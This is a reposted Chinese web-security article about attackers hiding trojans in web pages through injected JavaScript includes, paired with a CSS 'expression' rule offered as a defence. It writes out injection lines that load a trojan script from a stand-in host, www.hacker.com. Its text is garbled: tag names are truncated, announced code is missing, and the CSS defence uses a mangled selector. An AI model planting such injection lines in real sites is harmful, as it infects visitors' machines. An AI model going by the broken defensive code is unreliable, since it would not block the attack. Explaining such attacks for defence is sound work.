网络安全技巧:反击令人防不胜防的JS挂马

来源:天极网  作者:本站整理
网络安全技巧:反击令人防不胜防的JS挂马
摘要:如果将木马挂在JS脚本中,所有调用该JS脚本的网页都等同于被挂上了木马,对于需要肉鸡群的黑客而言是一劳永逸,因此JS脚本挂马逐渐开始被黑客应用。…

这种方法使用的关键代码如下:

这种代码往往很长,很容易被安全工程师发现,而且没有经验的黑客也喜欢将“width”和“border="1"Height=”参数设为“0”,但是设置为0后,可能会出现恶意代码不运行的情况。

<t src="http://www.hacker.com/木马脚本.js"></t>

或者

就成功地将木马挂到了对方的网页中了。

小提示:

黑客还可以根据情况随机变换插入的JS挂马方法,例如黑客有可能会将脚本写为:<divstyle="behaviour:url(http://www.hacker.com/木马脚本.js);">或者<esrc="vbt:[挂马脚本]">等。

防第一种JS挂马方式,不方便,用得非常少,而第二种JS挂马方式才是当前主流的,所以我们主要针对它进行防御。方法就是阻止Src请求的异地外域的JS脚本,代码如下:

emdy1:expression(this.src="about:blank",this.outerHTML="");

不过这种方法的缺点就是网站的访问者将不能看到被挂了JS木马的相关网页。

<title>让JS挂马中止的CSS代码</title>

<style type="text/css" id="shudoo">
  /*<![CDATA[*/
  emdy1:expression(this.src="about:blank",this.outerHTML="");
  /*]]>*/
  </style>

我们虽然能够巧妙地利用CSS代码防范E和JS脚本挂马,但是为什么网页挂马还是层出不穷?这恐怕就要说一说CSS挂马了,下次我们详细讨论。

【相关文章】好搜一下
思科交换机提供的三种交换模式

思科交换机提供的三种交换模式

交换机在交换数据帧时可以选择不同的模式来满足网络和用户的需要,思科的交换机提供三…